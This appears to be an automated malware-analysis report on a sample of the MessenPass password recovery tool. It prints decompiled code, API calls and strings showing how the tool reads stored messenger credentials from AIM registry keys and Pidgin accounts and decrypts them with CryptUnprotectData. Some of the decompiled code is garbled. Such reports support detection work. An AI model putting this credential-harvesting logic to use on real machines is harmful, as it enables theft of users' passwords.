                                				void _v1176;
                                				char _v2200;
                                				char _v2712;
                                				void _v3222;
                                				char _v3224;
                                				void* __esi;
                                				int _t118;
                                				signed int _t122;
                                				signed int _t123;
                                				wchar_t* _t127;
                                				int _t129;
                                				int _t137;
                                				void* _t146;
                                				int _t156;
                                				wchar_t* _t160;
                                				wchar_t* _t161;
                                				void* _t165;
                                				int _t175;
                                				wchar_t* _t178;
                                				wchar_t** _t182;
                                				signed int _t183;
                                				void* _t203;
                                				signed int _t205;
                                				signed int _t207;
                                				wchar_t* _t210;
                                				wchar_t* _t214;
                                				void* _t215;
                                				void* _t216;
                                				intOrPtr* _t217;
                                				void* _t218;
                                				void* _t243;
                                
                                				_t182 = __ebx;
                                				_t183 = 9;
                                				memcpy( &_v148, 0x417fb8, _t183 << 2);
                                				_t217 = _t216 + 0xc;
                                				_t118 = wcslen( &_v148);
                                				_t205 = 0;
                                				_v68 = _t118;
                                				 *_t217 = 0xbfe;
                                				_v3224 = 0;
                                				memset( &_v3222, 0, ??);
                                				_t218 = _t217 + 0xc;
                                				if(E00406B3B() == 0) {
                                					_push(3);
                                					_v20 = 4;
                                				} else {
                                					_push(4);
                                					_v20 = 5;
                                				}
                                				_pop(_t122);
                                				_t123 = _t122 << 9;
                                				_v28 = _t123;
                                				_t182[1] = _t215 + _t123 - 0xc94;
                                				 *_t182 =  &_v3224;
                                				_t182[3] =  &_v2712;
                                				_t127 = _t215 + (_v20 << 9) - 0xc94;
                                				_t182[4] =  &_v2200;
                                				_v64 = _t127;
                                				_t182[2] = _t127;
                                				_t203 = 0;
                                				_v12 = _t205;
                                				goto L5;
                                				L6:
                                				_v24 = _t205;
                                				_v32 = _t205;
                                				if(_v12 != _v20) {
                                					L20:
                                					if(_v12 != 4) {
                                						L30:
                                						if(_v32 == 0) {
                                							_t137 = _v16;
                                							if(_t137 > 0x1fa) {
                                								_t137 = 0x1fa;
                                							}
                                							_t99 = _a8 + 4; // 0x8
                                							_t207 = _v12 << 9;
                                							memcpy(_t215 + _t207 - 0xc94, _t203 + _t99, _t137);
                                							 *(_t215 + _t207 - 0xa96) =  *(_t215 + _t207 - 0xa96) & 0x00000000;
                                							_t218 = _t218 + 0xc;
                                							if(_v12 == 0) {
                                								E00406B3B();
                                							}
                                						}
                                						goto L35;
                                					}
                                					_t232 = _t182[5] - 4;
                                					if(_t182[5] != 4) {
                                						goto L30;
                                					}
                                					_v60 = 0;
                                					_v52 = 0;
                                					_v56 = 0;
                                					if(E00404C9D( &_v60, _t232) == 0) {
                                						L29:
                                						E00404CE0( &_v60);
                                						if(_v24 != 0) {
                                							goto L35;
                                						}
                                						goto L30;
                                					}
                                					_t146 = 0;
                                					do {
                                						_t72 = _t146 + 0x41da78; // 0x320038
                                						 *(_t146 + 0x41eb80) =  *_t72 << 2;
                                						_t146 = _t146 + 2;
                                					} while (_t146 < 0x4a);
                                					_t76 = _a8 + 4; // 0x8
                                					_v100 = _t203 + _t76;
                                					_v104 = _v16;
                                					_v88 = 0x4a;
                                					_v84 = 0x41eb80;
                                					if(E00404CF5( &_v60,  &_v104,  &_v88,  &_v48) != 0) {
                                						_t156 = _v48;
                                						if(_t156 > 0x1fa) {
                                							_t156 = 0x1fa;
                                						}
                                						memcpy( &_v1176, _v44, _t156);
                                						_t218 = _t218 + 0xc;
                                						_v666 = 0;
                                						LocalFree(_v44);
                                						_v24 = 1;
                                					}
                                					goto L29;
                                				} else {
                                					_t210 =  *_t182;
                                					_t160 = wcschr(_t210, 0x3d);
                                					if(_t160 != 0) {
                                						_t31 =  &(_t160[0]); // 0x2
                                						_t210 = _t31;
                                					}
                                					_t161 =  &_v148;
                                					0x413d86(_t210, _t161, _v68);
                                					_t218 = _t218 + 0xc;
                                					_t223 = _t161;
                                					if(_t161 != 0) {
                                						goto L20;
                                					}
                                					_v80 = 0;
                                					_v72 = 0;
                                					_v76 = 0;
                                					if(E00404C9D( &_v80, _t223) == 0) {
                                						L19:
                                						E00404CE0( &_v80);
                                						goto L20;
                                					}
                                					_t165 = 0;
                                					do {
                                						_t38 = _t165 + 0x41dac8; // 0x620061
                                						 *(_t165 + 0x41e980) =  *_t38 << 2;
                                						_t165 = _t165 + 2;
                                					} while (_t165 < 0x4a);
                                					_t42 = _a8 + 4; // 0x8
                                					_v108 = _t203 + _t42;
                                					_v112 = _v16;
                                					_v96 = 0x4a;
                                					_v92 = 0x41e980;
                                					if(E00404CF5( &_v80,  &_v112,  &_v96,  &_v40) != 0) {
                                						_t175 = _v40;
                                						if(_t175 > 0x1fa) {
                                							_t175 = 0x1fa;
                                						}
                                						_t214 = _t215 + _v28 - 0xc94;
                                						memcpy(_t214, _v36, _t175);
                                						 *(_t215 + _v28 - 0xa96) =  *(_t215 + _v28 - 0xa96) & 0x00000000;
                                						_t178 = wcschr(_t214, 0x3a);
                                						_t218 = _t218 + 0x14;
                                						if(_t178 != 0) {
                                							 *_t178 =  *_t178 & 0x00000000;
                                							wcscpy(_v64,  &(_t178[0]));
                                						}
                                						_v32 = 1;
                                						LocalFree(_v36);
                                					}
                                					goto L19;
                                				}
                                				L35:
                                				_v12 = _v12 + 1;
                                				_t203 = _t203 + _v16 + 4;
                                				if(E00406B3B() == 0) {
                                					__eflags = _v12 - 5;
                                				} else {
                                					_t243 = _v12 - 6;
                                				}
                                				if(_t243 >= 0 || _t203 > _a12) {
                                					 *((intOrPtr*)( *_a4))(_t182);
                                					return 1;
                                				} else {
                                					_t205 = 0;
                                					__eflags = 0;
                                					L5:
                                					_t129 =  *(_t203 + _a8);
                                					_v16 = _t129;
                                					if(_t129 <= _t205) {
                                						goto L35;
                                					}
                                					goto L6;
                                				}
                                			}


                                APIs
                                • wcslen.MSVCRT ref: 0040459A
                                • memset.MSVCRT ref: 004045BA
                                • wcschr.MSVCRT ref: 0040464E
                                • _wcsncoll.MSVCRT ref: 00404667
                                • memcpy.MSVCRT ref: 00404700
                                • wcschr.MSVCRT ref: 00404714
                                • wcscpy.MSVCRT ref: 0040472B
                                • memcpy.MSVCRT ref: 004047E3
                                • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C
                                  • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                • memcpy.MSVCRT ref: 0040483B
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProc_wcsncollmemsetwcscpywcslen
                                • String ID: ?L@$Microsoft_WinInet
                                • API String ID: 1802959924-2674056311
                                • Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                • Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
                                • Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                • Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004137F3
                                  • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                • strlen.MSVCRT ref: 0041380F
                                • memset.MSVCRT ref: 00413849
                                • memset.MSVCRT ref: 0041385D
                                • memset.MSVCRT ref: 00413871
                                • memset.MSVCRT ref: 00413897
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                  • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                • memcpy.MSVCRT ref: 004138CE
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                • memcpy.MSVCRT ref: 0041390A
                                • memcpy.MSVCRT ref: 0041391C
                                • _mbscpy.MSVCRT ref: 004139F3
                                • memcpy.MSVCRT ref: 00413A24
                                • memcpy.MSVCRT ref: 00413A36
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpymemset$strlen$_mbscpy
                                • String ID: salu
                                • API String ID: 3691931180-4177317985
                                • Opcode ID: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                • Instruction ID: 50f97ef88cf8910c77a3c81ceda6bafe80676b1d4533e7ed44b9b26706654b38
                                • Opcode Fuzzy Hash: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                • Instruction Fuzzy Hash: 48712DB290011DAADF10EF95DC819DE77B8BF08348F1445BAF548E7141DB78AB888F95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E00403EDF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a117889) {
                                				intOrPtr* _v8;
                                				char _v76;
                                				void _v1099;
                                				char _v1100;
                                				void _v2123;
                                				char _v2124;
                                				void _v3147;
                                				char _v3148;
                                				char _v4172;
                                				void* __ebx;
                                				void* __esi;
                                				void* _t41;
                                				void* _t42;
                                				void* _t53;
                                				void* _t59;
                                				signed int _t63;
                                				intOrPtr* _t69;
                                				void* _t79;
                                				void* _t82;
                                				void* _t83;
                                				intOrPtr _t88;
                                				intOrPtr _t89;
                                
                                				 *__eax =  *__eax + __eax;
                                				_a117889 = _a117889 + 0xc8;
                                				 *0x0008F951 =  *((intOrPtr*)(0x8f951)) + 0xc8;
                                				asm("adc [edx+0x55c30000], dh");
                                				0x414060(_t79);
                                				_t69 = 0xc8;
                                				_v8 = 0xc8;
                                				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
                                				_v1100 = 0;
                                				memset( &_v1099, 0, 0x3ff);
                                				_v3148 = 0;
                                				memset( &_v3147, 0, 0x3ff);
                                				_v2124 = 0;
                                				memset( &_v2123, 0, 0x3ff);
                                				_t83 = _t82 + 0x2c;
                                				_t88 =  *0x41e350; // 0x0
                                				if(_t88 != 0) {
                                					_push(0x41e350);
                                					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
                                					_t83 = _t83 + 0xc;
                                				}
                                				_t89 =  *0x41e34c; // 0x0
                                				if(_t89 != 0) {
                                					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
                                				}
                                				_t41 =  *((intOrPtr*)( *_t69 + 0x1c))();
                                				_t63 = 0x10;
                                				_push(_t41);
                                				_t42 = memcpy( &_v76, 0x419278, _t63 << 2);
                                				asm("movsb");
                                				sprintf( &_v4172,  &_v76,  &_v3148, _t42,  &_v1100);
                                				E004067EC(_a4,  &_v4172);
                                				_push("MessenPass");
                                				_t59 = 6;
                                				_push(E0040876F(_t59));
                                				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
                                				_t53 = E004067EC(_a4,  &_v2124);
                                				_t90 = _a8 - 4;
                                				if(_a8 == 4) {
                                					_t53 = E0040A5A6(_v8, _t90, _a4);
                                				}
                                				return _t53;
                                			}



                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • memset.MSVCRT ref: 00403F2E
                                • memset.MSVCRT ref: 00403F42
                                • memset.MSVCRT ref: 00403F56
                                • sprintf.MSVCRT ref: 00403F77
                                • _mbscpy.MSVCRT ref: 00403F93
                                • sprintf.MSVCRT ref: 00403FCA
                                • sprintf.MSVCRT ref: 00403FFB
                                Strings
                                • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                • MessenPass, xrefs: 00403FE1
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                • API String ID: 113626815-2158351146
                                • Opcode ID: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                • Instruction ID: 7e850c38df9f1f0d15d36b6f1642bcd7d5b849b9a1e92852595dac58af72d1cd
                                • Opcode Fuzzy Hash: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                • Instruction Fuzzy Hash: 963195B2904258BFDB11DBA59C42EDE7BACAF14304F0440ABF508B7141DA799FC88B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E00403EF6(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr* _v8;
                                				char _v76;
                                				void _v1099;
                                				char _v1100;
                                				void _v2123;
                                				char _v2124;
                                				void _v3147;
                                				char _v3148;
                                				char _v4172;
                                				void* __ebx;
                                				void* __esi;
                                				void* _t35;
                                				void* _t36;
                                				void* _t47;
                                				void* _t53;
                                				signed int _t57;
                                				intOrPtr* _t63;
                                				void* _t73;
                                				void* _t74;
                                				intOrPtr _t78;
                                				intOrPtr _t79;
                                
                                				0x414060();
                                				_t63 = __ecx;
                                				_v8 = __ecx;
                                				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
                                				_v1100 = 0;
                                				memset( &_v1099, 0, 0x3ff);
                                				_v3148 = 0;
                                				memset( &_v3147, 0, 0x3ff);
                                				_v2124 = 0;
                                				memset( &_v2123, 0, 0x3ff);
                                				_t74 = _t73 + 0x2c;
                                				_t78 =  *0x41e350; // 0x0
                                				if(_t78 != 0) {
                                					_push(0x41e350);
                                					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
                                					_t74 = _t74 + 0xc;
                                				}
                                				_t79 =  *0x41e34c; // 0x0
                                				if(_t79 != 0) {
                                					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
                                				}
                                				_t35 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                				_t57 = 0x10;
                                				_push(_t35);
                                				_t36 = memcpy( &_v76, 0x419278, _t57 << 2);
                                				asm("movsb");
                                				sprintf( &_v4172,  &_v76,  &_v3148, _t36,  &_v1100);
                                				E004067EC(_a4,  &_v4172);
                                				_push("MessenPass");
                                				_t53 = 6;
                                				_push(E0040876F(_t53));
                                				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
                                				_t47 = E004067EC(_a4,  &_v2124);
                                				_t80 = _a8 - 4;
                                				if(_a8 == 4) {
                                					_t47 = E0040A5A6(_v8, _t80, _a4);
                                				}
                                				return _t47;
                                			}

























                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • memset.MSVCRT ref: 00403F2E
                                • memset.MSVCRT ref: 00403F42
                                • memset.MSVCRT ref: 00403F56
                                • sprintf.MSVCRT ref: 00403F77
                                • _mbscpy.MSVCRT ref: 00403F93
                                • sprintf.MSVCRT ref: 00403FCA
                                • sprintf.MSVCRT ref: 00403FFB
                                Strings
                                • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                • MessenPass, xrefs: 00403FE1
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                • API String ID: 113626815-2158351146
                                • Opcode ID: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                • Instruction ID: 526b9c6c735ab5766b9493b9c4eecad717bc7371a22eeca07e3dbb649928e63f
                                • Opcode Fuzzy Hash: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                • Instruction Fuzzy Hash: 6E3187B2900218BADB51DB95DC42EDE7BACAF54304F0440A7F50CB7141DA799FC88B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 53%
                                			E004062DB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                				char _v8;
                                				intOrPtr _v12;
                                				int _v16;
                                				char _v20;
                                				char _v24;
                                				void* _v28;
                                				void _v1051;
                                				char _v1052;
                                				char _v2076;
                                				char _v3100;
                                				char _v4124;
                                				void _v5148;
                                				void _v6171;
                                				char _v6172;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				int _t61;
                                				intOrPtr _t63;
                                				int _t79;
                                				int _t81;
                                				char* _t86;
                                				void* _t96;
                                				void* _t102;
                                				long _t104;
                                				char _t105;
                                				void* _t108;
                                
                                				0x414060();
                                				_t61 = E004067BA(_a8);
                                				_t108 = _t61;
                                				_t96 = _t102;
                                				_v28 = _t108;
                                				if(_t108 != 0xffffffff) {
                                					_t104 = GetFileSize(_t108, 0);
                                					if(_t104 > 0) {
                                						_t3 = _t104 + 1; // 0x1
                                						_t63 = _t3;
                                						0x413d5c(_t63);
                                						_v12 = _t63;
                                						E00406ED6(_t96, 0, _t108, _t63, _t104);
                                						 *((char*)(_v12 + _t104)) = 0;
                                						_v24 = 0;
                                						_v1052 = 0;
                                						memset( &_v1051, 0, 0x3ff);
                                						_t105 = 0;
                                						_v16 = 0;
                                						_v20 = 0;
                                						_v8 = 0;
                                						_v6172 = 0;
                                						memset( &_v6171, 0, 0x3ff);
                                						memset( &_v5148, 0, 0x1000);
                                						if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
                                							L5:
                                							while(1) {
                                								if(_v16 > 0) {
                                									_t79 = strcmp( &_v1052, 0x4181f4);
                                									_pop(_t96);
                                									if(_t79 != 0) {
                                										__eflags = _v20;
                                										if(_v20 != 0) {
                                											__eflags = _t105;
                                											if(_t105 != 0) {
                                												__eflags = _t105 - 1;
                                												if(_t105 != 1) {
                                													__eflags = _t105 - 2;
                                													if(_t105 != 2) {
                                														__eflags = _t105 - 3;
                                														if(_t105 != 3) {
                                															__eflags = _t105 - 4;
                                															if(__eflags != 0) {
                                																if(__eflags > 0) {
                                																	__eflags = _v1052;
                                																	if(_v1052 == 0) {
                                																		L26:
                                																		_v8 = 0;
                                																	} else {
                                																		_t81 = strcmp( &_v1052, "---");
                                																		__eflags = _t81;
                                																		_pop(_t96);
                                																		if(_t81 == 0) {
                                																			goto L26;
                                																		}
                                																	}
                                																}
                                															} else {
                                																0x413d0c( &_v4124,  &_v1052);
                                																_pop(_t96);
                                																E0040623F(_a4,  &_v6172, _a8);
                                																_v5148 = 0;
                                																_v4124 = 0;
                                																_v3100 = 0;
                                																_v2076 = 0;
                                															}
                                														} else {
                                															_push( &_v1052);
                                															_t86 =  &_v2076;
                                															goto L20;
                                														}
                                													} else {
                                														_push( &_v1052);
                                														_t86 =  &_v5148;
                                														goto L20;
                                													}
                                												} else {
                                													_push( &_v1052);
                                													_t86 =  &_v3100;
                                													goto L20;
                                												}
                                											} else {
                                												_push( &_v1052);
                                												_t86 =  &_v6172;
                                												L20:
                                												0x413d0c();
                                												_t96 = _t86;
                                											}
                                											_t51 =  &_v8;
                                											 *_t51 = _v8 + 1;
                                											__eflags =  *_t51;
                                										}
                                									} else {
                                										if(_v20 == 0) {
                                											_v20 = 1;
                                										} else {
                                											_v5148 = 0;
                                											_v4124 = 0;
                                											_v3100 = 0;
                                											_v2076 = 0;
                                											_v6172 = 0;
                                										}
                                										_v8 = 0;
                                									}
                                								}
                                								_v16 = _v16 + 1;
                                								if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
                                									_t105 = _v8;
                                									continue;
                                								}
                                								goto L29;
                                							}
                                						}
                                						L29:
                                						0x413d56(_v12);
                                					}
                                					_t61 = CloseHandle(_v28);
                                				}
                                				return _t61;
                                			}































                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                  • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                • memset.MSVCRT ref: 00406349
                                • memset.MSVCRT ref: 00406368
                                • memset.MSVCRT ref: 0040637A
                                • strcmp.MSVCRT ref: 004063B9
                                • _mbscpy.MSVCRT ref: 0040644F
                                • _mbscpy.MSVCRT ref: 0040646B
                                • strcmp.MSVCRT ref: 004064B3
                                • ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                • CloseHandle.KERNEL32(?), ref: 004064EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Filememset$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                • String ID: ---
                                • API String ID: 3240106862-2854292027
                                • Opcode ID: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                • Instruction ID: 14ccde3f01574b0ce453d66bedc824b09869edf18580a01976bfbb4e6d9b59b2
                                • Opcode Fuzzy Hash: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                • Instruction Fuzzy Hash: A7517572C0415DAACF20DB949C819DEBBBCAF15314F1140FBE509B3181DA389BD98BAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 0040E768
                                • memset.MSVCRT ref: 0040E77C
                                • memset.MSVCRT ref: 0040E790
                                • memset.MSVCRT ref: 0040E7A8
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • sprintf.MSVCRT ref: 0040E7D8
                                • strlen.MSVCRT ref: 0040E806
                                • _mbscpy.MSVCRT ref: 0040E888
                                • _mbscpy.MSVCRT ref: 0040E89B
                                • RegCloseKey.ADVAPI32(?), ref: 0040E8ED
                                Strings
                                • Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users, xrefs: 0040E735
                                • Password, xrefs: 0040E7DE
                                • %s\Login, xrefs: 0040E7D2
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_mbscpy$CloseEnumOpensprintfstrlen
                                • String ID: %s\Login$Password$Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users
                                • API String ID: 1782299107-1248239246
                                • Opcode ID: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                • Instruction ID: fd41fae155906cc5ed66380c8c1da9a21ab341a1702a4efca81b6986be60196d
                                • Opcode Fuzzy Hash: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                • Instruction Fuzzy Hash: 4B41C4B2C0011CAEDB21EBA59C41BDEBBBC9F59304F4040EAE549A3101D6399F99CF68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,?,?,004104FD,?,?,?,?), ref: 004100C8
                                • memset.MSVCRT ref: 004100EA
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
                                • LocalFree.KERNEL32(?), ref: 004101C5
                                • RegCloseKey.ADVAPI32(?), ref: 004101D0
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                • RegCloseKey.ADVAPI32(?), ref: 004101F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                • API String ID: 551151806-1288872324
                                • Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                • Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
                                • Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                • Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi
                                • String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
                                • API String ID: 1439213657-1061492575
                                • Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                • Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
                                • Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                • Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 38%
                                			E00408EAA(struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                				void _v4103;
                                				char _v4104;
                                				intOrPtr _t29;
                                				struct HMENU__* _t31;
                                				intOrPtr* _t37;
                                				struct HWND__* _t41;
                                				struct HMENU__* _t46;
                                
                                				0x414060();
                                				if(_a8 != 4) {
                                					if(_a8 == 5) {
                                						_t37 =  *0x41e390; // 0x0
                                						if(_t37 == 0) {
                                							L8:
                                							_push(_a12);
                                							sprintf(0x41e308, "dialog_%d");
                                							_t41 = CreateDialogParamA(_a4, _a12, 0, E00408EA5, 0);
                                							_v4104 = 0;
                                							memset( &_v4103, 0, 0x1000);
                                							GetWindowTextA(_t41,  &_v4104, 0x1000);
                                							if(_v4104 != 0) {
                                								E00408CA1("caption",  &_v4104);
                                							}
                                							EnumChildWindows(_t41, E00408E37, 0);
                                							DestroyWindow(_t41);
                                						} else {
                                							while(1) {
